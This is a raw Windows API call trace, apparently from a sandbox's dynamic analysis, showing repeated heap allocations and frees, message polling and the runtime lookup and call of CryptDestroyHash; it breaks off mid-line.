[0168.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0168.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0168.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0168.516] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.517] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0168.517] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0168.518] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0168.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.519] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0168.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0168.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0168.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0168.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0168.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0168.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0168.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0168.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0168.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd570 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0168.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9e38 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f58 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0168.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0168.522] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0168.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0168.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0168.522] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0168.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0168.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0168.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0168.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0168.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0168.523] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0168.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0168.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0168.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d4c0 [0168.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d4c0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0168.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0168.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0168.524] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0168.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0168.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0168.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0168.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0168.525] CryptDestroyHash (hHash=0x90af58) returned 1 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0168.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0168.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0168.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: 